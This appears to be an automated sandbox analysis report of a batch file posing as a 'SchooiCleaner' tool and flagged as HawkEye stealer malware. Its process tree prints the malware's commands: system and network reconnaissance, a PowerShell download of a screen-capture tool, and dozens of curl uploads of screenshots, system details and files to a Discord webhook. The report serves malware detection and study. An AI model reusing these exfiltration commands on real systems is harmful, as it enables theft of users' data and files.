hawkeye | 4361ee39760d6451345a135dbb6845f2f17ddab9b1eb6c141c6cd37745b160c4

Analysis

max time kernel
136s
max time network
124s
platform
windows11-21h2_x64
resource
win11-20240709-en
resource tags

arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
submitted
14-07-2024 13:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SchooiCleaner_1.0___.bat
Size

3KB
MD5

465174459f8c6f3adb38ff015e8dc808
SHA1

8623ed6b17f5d17ffa00a162b1c5f7a784af7eb6
SHA256

4361ee39760d6451345a135dbb6845f2f17ddab9b1eb6c141c6cd37745b160c4
SHA512

f2a9c82f3b79f5d103e1dd485144f504dc468e626510b6b3b6e3004a667c0110a35eb2e9939b9697f4474de8a9c62457bfb03640193f5a462f10f44c0ac7b9d8

Score

10^/10

hawkeye execution keylogger spyware stealer trojan

Malware Config

Signatures

HawkEye
HawkEye is a malware kit that has seen continuous development since at least 2013.
keylogger trojan stealer spyware hawkeye

Blocklisted process makes network request 2 IoCs

flow	pid	Process
15	1068	powershell.exe
16	5616	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
5800	screenCapture.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
12	discord.com
14	raw.githubusercontent.com
16	raw.githubusercontent.com
17	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
12	api.ipify.org

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5616	powershell.exe

Delays execution with timeout.exe 4 IoCs

evasion

pid	Process
692	timeout.exe
892	timeout.exe
5632	timeout.exe
3220	timeout.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1928	ipconfig.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4156	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1628	PING.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1068	powershell.exe
1068	powershell.exe
5616	powershell.exe
5616	powershell.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

description	pid	Process
Token: SeDebugPrivilege	1068	powershell.exe
Token: SeIncreaseQuotaPrivilege	2384	WMIC.exe
Token: SeSecurityPrivilege	2384	WMIC.exe
Token: SeTakeOwnershipPrivilege	2384	WMIC.exe
Token: SeLoadDriverPrivilege	2384	WMIC.exe
Token: SeSystemProfilePrivilege	2384	WMIC.exe
Token: SeSystemtimePrivilege	2384	WMIC.exe
Token: SeProfSingleProcessPrivilege	2384	WMIC.exe
Token: SeIncBasePriorityPrivilege	2384	WMIC.exe
Token: SeCreatePagefilePrivilege	2384	WMIC.exe
Token: SeBackupPrivilege	2384	WMIC.exe
Token: SeRestorePrivilege	2384	WMIC.exe
Token: SeShutdownPrivilege	2384	WMIC.exe
Token: SeDebugPrivilege	2384	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2384	WMIC.exe
Token: SeRemoteShutdownPrivilege	2384	WMIC.exe
Token: SeUndockPrivilege	2384	WMIC.exe
Token: SeManageVolumePrivilege	2384	WMIC.exe
Token: 33	2384	WMIC.exe
Token: 34	2384	WMIC.exe
Token: 35	2384	WMIC.exe
Token: 36	2384	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2384	WMIC.exe
Token: SeSecurityPrivilege	2384	WMIC.exe
Token: SeTakeOwnershipPrivilege	2384	WMIC.exe
Token: SeLoadDriverPrivilege	2384	WMIC.exe
Token: SeSystemProfilePrivilege	2384	WMIC.exe
Token: SeSystemtimePrivilege	2384	WMIC.exe
Token: SeProfSingleProcessPrivilege	2384	WMIC.exe
Token: SeIncBasePriorityPrivilege	2384	WMIC.exe
Token: SeCreatePagefilePrivilege	2384	WMIC.exe
Token: SeBackupPrivilege	2384	WMIC.exe
Token: SeRestorePrivilege	2384	WMIC.exe
Token: SeShutdownPrivilege	2384	WMIC.exe
Token: SeDebugPrivilege	2384	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2384	WMIC.exe
Token: SeRemoteShutdownPrivilege	2384	WMIC.exe
Token: SeUndockPrivilege	2384	WMIC.exe
Token: SeManageVolumePrivilege	2384	WMIC.exe
Token: 33	2384	WMIC.exe
Token: 34	2384	WMIC.exe
Token: 35	2384	WMIC.exe
Token: 36	2384	WMIC.exe
Token: SeDebugPrivilege	5616	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2540 wrote to memory of 2260	2540	cmd.exe	83
PID 2540 wrote to memory of 2260	2540	cmd.exe	83
PID 2540 wrote to memory of 2364	2540	cmd.exe	84
PID 2540 wrote to memory of 2364	2540	cmd.exe	84
PID 2540 wrote to memory of 2320	2540	cmd.exe	85
PID 2540 wrote to memory of 2320	2540	cmd.exe	85
PID 2540 wrote to memory of 692	2540	cmd.exe	86
PID 2540 wrote to memory of 692	2540	cmd.exe	86
PID 2540 wrote to memory of 4756	2540	cmd.exe	88
PID 2540 wrote to memory of 4756	2540	cmd.exe	88
PID 4756 wrote to memory of 1628	4756	cmd.exe	89
PID 4756 wrote to memory of 1628	4756	cmd.exe	89
PID 4756 wrote to memory of 6012	4756	cmd.exe	90
PID 4756 wrote to memory of 6012	4756	cmd.exe	90
PID 2540 wrote to memory of 2988	2540	cmd.exe	91
PID 2540 wrote to memory of 2988	2540	cmd.exe	91
PID 2988 wrote to memory of 1068	2988	cmd.exe	92
PID 2988 wrote to memory of 1068	2988	cmd.exe	92
PID 2540 wrote to memory of 892	2540	cmd.exe	93
PID 2540 wrote to memory of 892	2540	cmd.exe	93
PID 2540 wrote to memory of 1928	2540	cmd.exe	94
PID 2540 wrote to memory of 1928	2540	cmd.exe	94
PID 2540 wrote to memory of 4156	2540	cmd.exe	95
PID 2540 wrote to memory of 4156	2540	cmd.exe	95
PID 2540 wrote to memory of 2384	2540	cmd.exe	98
PID 2540 wrote to memory of 2384	2540	cmd.exe	98
PID 2540 wrote to memory of 5632	2540	cmd.exe	99
PID 2540 wrote to memory of 5632	2540	cmd.exe	99
PID 2540 wrote to memory of 5616	2540	cmd.exe	100
PID 2540 wrote to memory of 5616	2540	cmd.exe	100
PID 2540 wrote to memory of 1536	2540	cmd.exe	101
PID 2540 wrote to memory of 1536	2540	cmd.exe	101
PID 2540 wrote to memory of 1536	2540	cmd.exe	101
PID 1536 wrote to memory of 5940	1536	csc.exe	102
PID 1536 wrote to memory of 5940	1536	csc.exe	102
PID 1536 wrote to memory of 5940	1536	csc.exe	102
PID 2540 wrote to memory of 5800	2540	cmd.exe	103
PID 2540 wrote to memory of 5800	2540	cmd.exe	103
PID 2540 wrote to memory of 3696	2540	cmd.exe	104
PID 2540 wrote to memory of 3696	2540	cmd.exe	104
PID 2540 wrote to memory of 596	2540	cmd.exe	105
PID 2540 wrote to memory of 596	2540	cmd.exe	105
PID 2540 wrote to memory of 4572	2540	cmd.exe	106
PID 2540 wrote to memory of 4572	2540	cmd.exe	106
PID 2540 wrote to memory of 3888	2540	cmd.exe	107
PID 2540 wrote to memory of 3888	2540	cmd.exe	107
PID 2540 wrote to memory of 5148	2540	cmd.exe	108
PID 2540 wrote to memory of 5148	2540	cmd.exe	108
PID 2540 wrote to memory of 8	2540	cmd.exe	109
PID 2540 wrote to memory of 8	2540	cmd.exe	109
PID 2540 wrote to memory of 2284	2540	cmd.exe	110
PID 2540 wrote to memory of 2284	2540	cmd.exe	110
PID 2540 wrote to memory of 4612	2540	cmd.exe	111
PID 2540 wrote to memory of 4612	2540	cmd.exe	111
PID 2540 wrote to memory of 3524	2540	cmd.exe	112
PID 2540 wrote to memory of 3524	2540	cmd.exe	112
PID 2540 wrote to memory of 3076	2540	cmd.exe	113
PID 2540 wrote to memory of 3076	2540	cmd.exe	113
PID 2540 wrote to memory of 4432	2540	cmd.exe	114
PID 2540 wrote to memory of 4432	2540	cmd.exe	114
PID 2540 wrote to memory of 4036	2540	cmd.exe	115
PID 2540 wrote to memory of 4036	2540	cmd.exe	115
PID 2540 wrote to memory of 5924	2540	cmd.exe	116
PID 2540 wrote to memory of 5924	2540	cmd.exe	116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SchooiCleaner_1.0___.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2540
- C:\Windows\system32\mode.com
  mode con cols=80 lines=30
  2⤵
  PID:2260
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:2364
- C:\Windows\system32\chcp.com
  chcp 437
  2⤵
  PID:2320
- C:\Windows\system32\timeout.exe
  timeout /t 5 /NOBREAK
  2⤵
  - Delays execution with timeout.exe
  PID:692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ping -4 -n 1 EHECWUZY | findstr [
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4756
- - C:\Windows\system32\PING.EXE
    ping -4 -n 1 EHECWUZY
    3⤵
    - Runs ping.exe
    PID:1628
- - C:\Windows\system32\findstr.exe
    findstr [
    3⤵
    PID:6012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell Invoke-RestMethod api.ipify.org
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2988
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Invoke-RestMethod api.ipify.org
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1068
- C:\Windows\system32\timeout.exe
  timeout /t 5 /NOBREAK
  2⤵
  - Delays execution with timeout.exe
  PID:892
- C:\Windows\system32\ipconfig.exe
  ipconfig
  2⤵
  - Gathers network information
  PID:1928
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:4156
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path softwarelicensingservice get OA3xOriginalProductKey
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2384
- C:\Windows\system32\timeout.exe
  timeout /t 5 /NOBREAK
  2⤵
  - Delays execution with timeout.exe
  PID:5632
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "irm -useb https://raw.githubusercontent.com/npocmaka/batch.scripts/master/hybrids/.net/c/screenCapture.bat"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5616
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /out:"screenCapture.exe" "C:\Users\Admin\AppData\Local\Temp\SCREEN~1.BAT"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1536
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79CF.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCA8B082AB58D4426B75C42DD92DCEA25.TMP"
    3⤵
    PID:5940
- C:\Users\Admin\AppData\Local\Temp\screenCapture.exe
  screenCapture.exe screenshot.png
  2⤵
  - Executes dropped EXE
  PID:5800
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"~=CONNECTION ESTABLISHED=~ \nDate: Sun 07/14/2024 \nTime: 13:17:36.46 \nUsername: Admin \nComputer Name: EHECWUZY \nPublic IP: 194.110.13.70 \nPrivate IP: 10.127.0.146 \nInfo and Screenshot:\"}" -F "[email protected]" -F "[email protected]" -F "[email protected]" -F "[email protected]" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:3696
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:596
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:4572
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:3888
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:5148
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:8
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:2284
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:4612
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:3524
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:3076
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:4432
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:4036
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:5924
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "file1=@Microsoft Edge.lnk" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:2044
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:5640
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:3932
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:1644
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:4964
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:5592
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:3004
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:5020
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:5484
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:5284
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:2224
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:1452
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:992
- C:\Windows\system32\curl.exe
  curl -k -F "payload_json={\"content\": \"\"}" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
  2⤵
  PID:4556
- C:\Windows\system32\timeout.exe
  timeout /t 3
  2⤵
  - Delays execution with timeout.exe
  PID:3220

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3436

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
c314cc5917d5a78a4e88f66d7114878c

SHA1
f4b714a9e5ac21fd60022a65818557e5ed192cf5

SHA256
eb8e99e59a78efe2b90663fdfca03f6664fed69cfa7a807e88047ffc6d674c31

SHA512
c02db5c81d2a55ef6b960b7b60b8bc7ad57ae250c1fe8709c40cab7acdcbfcf1fc0675682ea01ffe85cbd4146f67e1c90132d75e014d30403683e856615a4058

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ad60aefe903d80a798b904be4a3f0283

SHA1
5a27227a9aec298c043d9fe4162cc64664c01a25

SHA256
17c944d3e6e2a0dd06c58ae9cefe305fa7da552c010c012625abcc9585eeb214

SHA512
5a9ed746dd825929a2fa1a00b983563538be92a6b85df3728177e3a026babf659c0afadbf544c27aeae9b492b62ac9319af50eeeae610b0aee5256966d96470a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES79CF.tmp

Filesize
1KB

MD5
0f133e69c8530b8ae98ec4adb4e9b1d0

SHA1
065c0f3aec8b2d506d0f2baa03e6e6868118b0c5

SHA256
0868235947268f367cb807d65816e4f1596f855cc435b84f99938a4ebafb857d

SHA512
e4e7eddb107b92b4d3e7e748f3c26532cdfcbc5865ef19881afc496ec1d7e00755b2f7fa2a9d6c3d38a9a0a1ff2d6b5043219c4f78c57eef72a5140dcb410b8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n5wo5z4y.ip3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dir.txt

Filesize
9KB

MD5
851ffc982e513bf50a75b4f81edf582d

SHA1
3918d31b5136eb012c1c7edb975b0f91a9abbad6

SHA256
dfdf810615ce2e8f00b24f1ef983789022478969eea1369733692c4fc0180eb4

SHA512
fb3ef5582b7a70d85dc122d29dff2e98719f1fc42dbd913d5f3479df447034ba5b72ba74d9013e9c32da6ce50517888b3a6fe3f7ce9f02f73c96bfa2ad3d93b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ipconfig.txt

Filesize
346B

MD5
dcdb73ae0926f69516bd5b5b9d2d1888

SHA1
fda0767da11c328981ccb9998af535a7929f0a1f

SHA256
aa743f1eaec4122e2b452997ebc80e7db7fa9583709bb64e3df9a7d15f1bea95

SHA512
d596a66800fb402a03d42a6b4bc13c9a402f929e761d39ab810ee836377e3c00658231ae730c5488af4f6a223f407d69ded6c484b61058c07cb1bc0625ca984b

Download Submit
C:\Users\Admin\AppData\Local\Temp\liscense.txt

Filesize
127B

MD5
b77c85675375ed548a4c019ae9ad5eda

SHA1
f1f6559245707e38403b72c57f201784f1086f7d

SHA256
81a02546f3d9da106053d1800ba1a0c00815a8903661b5c1c086a5c88aedd1f9

SHA512
3d6cdefda811dcaaff88f54117f03bfff04a04ba03efdf45167a7c4712bab3334974b404421d5bd1e3ad7eb65b0c390ddf472f9d256bd0cd8786e87ab8571bef

Download Submit
C:\Users\Admin\AppData\Local\Temp\screenCapture.bat

Filesize
8KB

MD5
7c39bedd33b129b84117cb4e188eb9b6

SHA1
43e660c225a60a8327c7ce73ab6abaddcd412122

SHA256
2490bf909afee37ddc6dca73d51950c648b815b8d5a1fd853ad9f69413f4a711

SHA512
de368b8161612f7998f98b15a36028068b08052fceb2468855005cdc5ae6e44bebc8e6d3f0b6d340cd6308597863c003a353fe95eedd6a0a5bb4320e36ba7490

Download Submit
C:\Users\Admin\AppData\Local\Temp\screenCapture.exe

Filesize
8KB

MD5
4a68364176d5b85c0c42bd1dabdd399d

SHA1
6b693434b279f571a4e816c175ae12239c226e32

SHA256
b1437c0601bd59676a95865b8919728f954e22a602c11be285919ab471343762

SHA512
9c7af471cdf60f7581e380ebafd37dfee2b0834289383b9de3e768707a447cd8bcb9f271e8a357143d9076ce85bab3fe40a2ccfb3c0f4e60f7660f32e6f57aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\screenshot.png

Filesize
271KB

MD5
f82c9e40b7cae4ff5450ee68768df515

SHA1
5c9a0d485be491e63cb11db7e55f675599f84ba6

SHA256
b451967373e438503dc1eab458bea08fc388c489ffb4c5d31e367f7d6e72f8aa

SHA512
dfd7602f17bf71a190fc058b14f160cb204c951285ba5e1d1da777c71b30d5df6a122366a615a7cde1186f9e2f065b6a95f0fc2ebdc88c30d16ea39f7695e79d

Download Submit
C:\Users\Admin\AppData\Local\Temp\sysinfo.txt

Filesize
2KB

MD5
57ed60900c36f66a54186df4150c80eb

SHA1
e55ea3cb420ae7c6f59f5004e1ce7168efec4b9d

SHA256
a6540f80fc8a3910299935b562b547015fb5fdb8809e604a26018759cbbd5413

SHA512
85fd807a25a26430df9ca5512a94c78c576e6cdd35d6cc5ad981758d2afe9e0ff39109464f094cb6ef8158d0759fae3637fe75864b1c997797ce78423f7f27fc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCCA8B082AB58D4426B75C42DD92DCEA25.TMP

Filesize
1KB

MD5
b4aaae3b532554d0c7bd317d4834ab16

SHA1
28c854e399a3993ffd0df37b4385e29b4fe12905

SHA256
d7b2270159728b32e1ed60b03900ab7c9cb3c27df8f2456eae6824ad12f00f62

SHA512
ac6d36c61b057a0196cda5e249c5184a983bbf490ff1b54a6f263417e10c071addcb8437c840592e31637905e1fee10912e5932f9982e2abedc68cbb4a5e96a8

Download Submit
memory/1068-15-0x00007FF883D20000-0x00007FF8847E2000-memory.dmp

Filesize
10.8MB

Download
memory/1068-12-0x000001FD7FB60000-0x000001FD7FD22000-memory.dmp

Filesize
1.8MB

Download
memory/1068-0-0x00007FF883D23000-0x00007FF883D25000-memory.dmp

Filesize
8KB

Download
memory/1068-11-0x00007FF883D20000-0x00007FF8847E2000-memory.dmp

Filesize
10.8MB

Download
memory/1068-9-0x00007FF883D20000-0x00007FF8847E2000-memory.dmp

Filesize
10.8MB

Download
memory/1068-10-0x000001FD7F510000-0x000001FD7F532000-memory.dmp

Filesize
136KB

Download
memory/5800-63-0x0000000000D60000-0x0000000000D68000-memory.dmp

Filesize
32KB

Download